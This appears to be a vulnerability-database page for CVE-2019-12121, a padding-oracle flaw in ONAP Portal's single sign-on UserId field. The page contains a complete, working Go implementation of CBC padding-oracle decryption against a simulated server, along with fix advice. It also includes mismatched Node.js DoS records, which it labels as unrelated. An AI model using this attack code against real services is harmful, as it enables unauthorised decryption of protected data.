CVE-2019-12121
Published 2020-03-18
Priority: P3 (40) · CVSS 3.1: 7.5 high
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS: 0.73% (49.4th percentile)
An issue was detected in ONAP Portal through Dublin. By executing a padding oracle attack using the ONAPPORTAL/processSingleSignOn UserId field, an attacker is able to decrypt arbitrary information encrypted with the same symmetric key as UserId. All Portal setups are affected.
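The description names the technique but not the mechanics, so here is the generic CBC padding-oracle decryption it refers to, in Go, as an added example that is not part of this page, of the ONAP Portal code base or of any public exploit for this CVE. The page does not document the cipher, mode or error behaviour of ONAP Portal's UserId handling, so the example assumes AES-CBC with PKCS#7 padding and a server whose padding failure is distinguishable from every other failure (modelled as a distinct error value; in a real deployment the distinguisher may be an HTTP status, an error message or a timing difference). The `portal` type, the token layout `iv || ciphertext` and the victim token are constructed for the demonstration; only the attack function `paddingOracleDecrypt` is the technique itself.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// portal models a server that protects an opaque user-id token with
// AES-CBC and PKCS#7 padding. This construction is an assumption for the
// demo; the page does not document ONAP Portal's actual scheme.
type portal struct{ key []byte }

var errPadding = errors.New("invalid padding")

func newPortal() *portal {
	k := make([]byte, 16)
	if _, err := rand.Read(k); err != nil {
		panic(err)
	}
	return &portal{key: k}
}

func pkcs7Pad(b []byte, bs int) []byte {
	n := bs - len(b)%bs
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, bs int) ([]byte, error) {
	if len(b) == 0 || len(b)%bs != 0 {
		return nil, errPadding
	}
	n := int(b[len(b)-1])
	if n == 0 || n > bs || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errPadding
	}
	return b[:len(b)-n], nil
}

// encrypt returns iv || AES-CBC(pad(plain)) under the portal's key.
func (p *portal) encrypt(plain []byte) []byte {
	blk, _ := aes.NewCipher(p.key)
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}
	padded := pkcs7Pad(plain, aes.BlockSize)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(out, padded)
	return append(iv, out...)
}

// decrypt is the vulnerable server side: a padding failure is reported
// distinctly from every other failure, which is all the oracle needs.
func (p *portal) decrypt(tok []byte) ([]byte, error) {
	if len(tok) < 2*aes.BlockSize || len(tok)%aes.BlockSize != 0 {
		return nil, errors.New("malformed token")
	}
	blk, _ := aes.NewCipher(p.key)
	out := make([]byte, len(tok)-aes.BlockSize)
	cipher.NewCBCDecrypter(blk, tok[:aes.BlockSize]).CryptBlocks(out, tok[aes.BlockSize:])
	return pkcs7Unpad(out, aes.BlockSize)
}

// paddingOracle is the attacker's view: did the server accept the padding?
func (p *portal) paddingOracle(tok []byte) bool {
	_, err := p.decrypt(tok)
	return !errors.Is(err, errPadding)
}

// paddingOracleDecrypt recovers the plaintext of iv||ct using only the oracle.
// For each block it learns the intermediate state D_k(block) one byte at a
// time, from the last byte backwards, by forging the preceding block.
func paddingOracleDecrypt(tok []byte, oracle func([]byte) bool) ([]byte, error) {
	bs := aes.BlockSize
	var plain []byte
	for off := bs; off < len(tok); off += bs {
		prev, target := tok[off-bs:off], tok[off:off+bs]
		inter := make([]byte, bs)
		for pos := bs - 1; pos >= 0; pos-- {
			pad := byte(bs - pos)
			forged := make([]byte, bs)
			for j := pos + 1; j < bs; j++ {
				forged[j] = inter[j] ^ pad // already-known bytes decrypt to pad
			}
			found := false
			for g := 0; g < 256 && !found; g++ {
				forged[pos] = byte(g)
				if !oracle(append(append([]byte{}, forged...), target...)) {
					continue
				}
				if pos == bs-1 {
					// Rule out a false positive such as ...\x02\x02: disturb the
					// byte before the last one; a genuine \x01 still validates.
					forged[pos-1] ^= 0xff
					ok := oracle(append(append([]byte{}, forged...), target...))
					forged[pos-1] ^= 0xff
					if !ok {
						continue
					}
				}
				inter[pos] = byte(g) ^ pad
				found = true
			}
			if !found {
				return nil, fmt.Errorf("no valid padding at block %d byte %d", off/bs, pos)
			}
		}
		for j := 0; j < bs; j++ {
			plain = append(plain, inter[j]^prev[j]) // P = D_k(C_i) XOR C_{i-1}
		}
	}
	return pkcs7Unpad(plain, bs)
}

func main() {
	p := newPortal()
	// Constructed victim token: the attacker never sees p.key, only oracle verdicts.
	tok := p.encrypt([]byte("victim_user_id=demo_user@example.org"))
	got, err := paddingOracleDecrypt(tok, p.paddingOracle)
	fmt.Printf("recovered %q (err=%v)\n", got, err)
}
```

Two points the description compresses: the oracle is keyed only on the server's key, so any ciphertext produced under that key (not just the attacker's own UserId) can be fed in as `target`, which is why the advisory says "arbitrary information encrypted with the same symmetric key"; and the cost is at most 256 oracle queries per byte (about 128 on average), so a 32-byte value falls to a few thousand requests. The fix is to remove the oracle rather than hide it: authenticated encryption (for example AES-GCM) or encrypt-then-MAC with the MAC checked before any decryption, with one uniform failure response.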
Affected
2 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | cm1_nodejs_14.17.2-1_on_cbl_mariner_1.0 | — | — |
| onap | open_network_automation_platform | >= 3.0.0 < 4.0.0 | 4.0.0 |

Note: the msrc row is inherited from the Microsoft record quoted further down, which is for CVE-2019-5737 (a Node.js denial of service) and does not concern ONAP Portal; it should not be read as a Node.js exposure to this padding oracle. The onap row is the only range that applies to CVE-2019-12121. Reconcile it against the description's "through Dublin" wording and the ONAP Portal release notes before using it to scope affected deployments.
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vendor_msrc | — | 7.5 | HIGH | — |
| vendor_redhat | — | 7.5 | HIGH | — |

The two vendor scores come from the Microsoft and Red Hat records quoted below, which score CVE-2019-5737 (Node.js), not this CVE. For CVE-2019-12121 the applicable score is the NVD v3.1 entry: network-reachable, no privileges or user interaction required, and confidentiality impact only (C:H/I:N/A:N), which is consistent with a decryption oracle that discloses data without modifying it.
GHSA
GHSA-2hpg-3rp7-m4h7: An issue was detected in ONAP Portal through Dublin
ghsa_unreviewed · 2022-05-24 · CVE-2019-12121 [MEDIUM] CWE-311
Description identical to the NVD text above.
Microsoft
vendor_msrc · 2019-03-12 · CVSS 7.5
CVE-2019-5737 [HIGH] CWE-770
Note: this record is for CVE-2019-5737, a Node.js denial of service, and does not describe CVE-2019-12121.
In Node.js including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1, an attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and by sending headers very slowly. This keeps the connection and associated resources alive for a long period of time. Potential attacks are mitigated by the use of a load balancer or other proxy layer. This vulnerability is an extension of CVE-2018-12121, addressed in November, and impacts all active Node.js release lines including 6.x before 6.17.0, 8.x before 8.15.1, 10.x before 10.15.2, and 11.x before 11.10.1.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits
Red Hat
vendor_redhat · 2019-02-28 · CVSS 7.5
CVE-2019-5737 [HIGH] CWE-400: nodejs: Insufficient Slowloris fix causing DoS via server.headersTimeout bypass
Note: like the Microsoft record, this is CVE-2019-5737 (Node.js), not CVE-2019-12121. Its description is the same Node.js advisory text quoted above, with one Red Hat statement added:
It was found that the original fix for Slowloris, CVE-2018-12122, was insufficient.
The two records cite different identifiers for the earlier fix (CVE-2018-12121 in the Node.js text, CVE-2018-12122 here); CVE-2018-12122 is the identifier assigned to the November 2018 Node.js Slowloris fix, while CVE-2018-12121 covered the large-HTTP-headers denial of service from the same release.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.